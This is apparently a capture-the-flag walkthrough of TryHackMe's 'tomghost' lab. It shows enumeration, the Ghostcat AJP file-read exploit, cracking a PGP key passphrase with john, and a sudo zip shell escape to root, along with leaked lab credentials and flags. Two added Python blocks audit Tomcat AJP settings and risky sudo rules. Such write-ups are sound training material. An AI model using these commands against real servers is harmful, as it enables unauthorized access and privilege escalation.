In this walkthrough, we will go through the tomghost room from TryHackMe. The room is rated easy on the platform, and the objective is to identify recent vulnerabilities in order to exploit the system or read files that we should not have access to. So, let’s get started without any delay.
Machine Info:
Title | tomghost
IP address | 10.10.203.67
Difficulty | Easy
Objective | Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.
Enumeration:
- Checking if machine is live or not.
- I started with a normal Nmap scan with version detection.
sudo nmap -sS -sV 10.10.222.43
- Next, I used gobuster to perform directory bruteforcing to reveal some juicy directories.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.222.43:8080/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.43:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/13 21:02:54 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
===============================================================
2023/04/13 21:04:31 Finished
===============================================================
- Googling “Apache Tomcat 9.0.30 vulnerabilities” turned up one: CVE-2020-1938 (Ghostcat), a file-read flaw in Tomcat’s AJP connector, which listens on port 8009.
Exploit: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
- Firing the exploit against the AJP port to read WEB-INF/web.xml, we found a potential username and password combination in the file’s description section, right beneath the “Welcome to GhostCat” line. We can now use it to get initial access via SSH.
wh1terose@fsociety:~/CTF/TryHackme/tomghost/Hacking-Vulnerability-CVE-2020-1938-Ghostcat$ python2 CVE-2020-1938.py 10.10.222.43 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.222.43:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
     skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
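As an added, defender-side example (not code from the walkthrough or the room), the Python below audits a Tomcat server.xml for the exposure Ghostcat relies on: an AJP/1.3 connector reachable beyond loopback with no shared secret. Both server.xml fragments are constructed for illustration; the address, secretRequired and secret attributes are Tomcat's own connector attributes (the latter two were introduced in 9.0.31, the fix release).

```python
"""Audit a Tomcat server.xml for AJP connectors exposed the way Ghostcat (CVE-2020-1938) abused."""
import xml.etree.ElementTree as ET

# Constructed sample: the stock Tomcat 9.0.30 AJP connector, on all interfaces, no secret.
VULNERABLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: hardened form (address/secretRequired/secret are real Tomcat 9.0.31+ attributes).
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_A_RANDOM_SECRET" redirectPort="8443" />
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per weakness on each AJP connector (an empty list means nothing to fix)."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        # Ghostcat needs to reach the AJP port; binding to loopback keeps it off the network.
        if address not in LOOPBACK:
            findings.append(f"port {port}: AJP listens on {address or 'all interfaces'}; bind to loopback or disable")
        # Without a shared secret, any client that can reach the port can speak AJP to Tomcat.
        if conn.get("secretRequired", "true").lower() != "true" or not conn.get("secret"):
            findings.append(f"port {port}: no AJP shared secret; set secretRequired=\"true\" and a secret")
    return findings

if __name__ == "__main__":
    for name, xml in (("vulnerable", VULNERABLE_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp_connectors(xml) or ["OK"])
```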
Gaining Access:
- Let’s log into the server over SSH using the credentials below.
Creds: skyfuck:8730281lkjlkjdqlksalks
- We found two files, one .asc file and one .pgp file. We will target the .asc file first, as it contains a PGP private key.
skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$ cat tryhackme.asc
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.63
<-- snipped -->
-----END PGP PRIVATE KEY BLOCK-----
- Cracking the private key’s passphrase with john. First I saved the key to hash.txt, converted it to john’s hash format with gpg2john, and then ran john against it.
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ gedit hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/gpg2john hash.txt > crack

File hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ls
crack  Hacking-Vulnerability-CVE-2020-1938-Ghostcat  hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/john crack
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-13 21:53) 0g/s 21405p/s 21405c/s 21405C/s Comstuxnet1900..Cstuxnet1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
alexandru        (tryhackme)
1g 0:00:00:00 DONE 2/3 (2023-04-13 21:53) 1.052g/s 21303p/s 21303c/s 21303C/s rooney..blahblah1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- GPG password: alexandru
- Decrypting credential.pgp with the passphrase cracked above.
skyfuck@ubuntu:~$ gpg -d credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <[email protected]>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:~$
Merlin password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
Privilege Escalation:
- First, I checked whether there was any binary we could run with sudo, and found one.
merlin@ubuntu:/$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
- Using the GTFOBins entry for zip, we elevate our privileges through the sudo-allowed zip binary.
merlin@ubuntu:/$ TF=$(mktemp -u)
merlin@ubuntu:/$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/
# cd root
# ls
root.txt  ufw
# cat root.txt
THM{Z1P_1S_FAKE}
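On the defender's side, a quick way to catch this class of misconfiguration is to audit `sudo -l` output for NOPASSWD root rules on binaries with known shell escapes. The Python below is an added example, not code from the walkthrough; it parses the room's `sudo -l` output quoted above and uses a constructed one-entry watchlist (zip) where a real audit would load a maintained list such as GTFOBins.

```python
"""Parse `sudo -l` output and flag NOPASSWD root rules on binaries with known shell escapes."""
import re

# The room's `sudo -l` output as quoted in the walkthrough (raw string keeps the literal backslashes).
SAMPLE_SUDO_L = r"""Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
"""

# Constructed watchlist; a real audit would load a maintained list such as GTFOBins.
SHELL_ESCAPE_BINARIES = {"zip"}

# One rule line: "(runas_user : runas_group) TAG: TAG: /path/to/cmd args, /path/to/other"
RULE_RE = re.compile(
    r"^\s*\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(output: str) -> list:
    """Return a dict per allowed command: runas_user, runas_group, nopasswd, command."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything before this line is Defaults, not rules
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        for cmd in m.group("cmd").split(","):  # sudo lists several commands per rule comma-separated
            rules.append({
                "runas_user": m.group("user").strip(),
                "runas_group": (m.group("group") or "").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "command": cmd.strip(),
            })
    return rules

def risky_rules(rules: list, watchlist=SHELL_ESCAPE_BINARIES) -> list:
    """Rules that run as root (or ALL) with no password and whose binary is on the watchlist."""
    return [r for r in rules
            if r["runas_user"] in ("root", "ALL") and r["nopasswd"]
            and r["command"].split()[0].rsplit("/", 1)[-1] in watchlist]

if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("RISK:", r)
```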
Task 1 – Flags
Question 1 – Compromise this machine and obtain user.txt
THM{GhostCat_1s_so_cr4sy}
Question 2 – Escalate privileges and obtain root.txt
THM{Z1P_1S_FAKE}
Conclusion:
So that was “tomghost” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection and found two ports open – 22 (SSH) and 8080 (Apache Tomcat). Next, we fired up gobuster to perform some directory bruteforcing and reveal some juicy directories. Moving on, I looked for known exploits for Apache Tomcat 9.0.30 and found CVE-2020-1938 (Ghostcat). Using the exploit, we got credentials to log into the server and gained initial access. Once inside, we found two files, one .asc file and one .pgp file. We converted and cracked the .asc key with john and used that passphrase to decrypt the .pgp file, which revealed the user merlin and their password. At last, we used the zip binary sudo misconfiguration to escalate our privileges, get the root flag, and the hair of the neighbor’s black cat for our voodoo procedure. On that note, I will take your leave and will see you in the next one. Till then, “Hack the Planet”.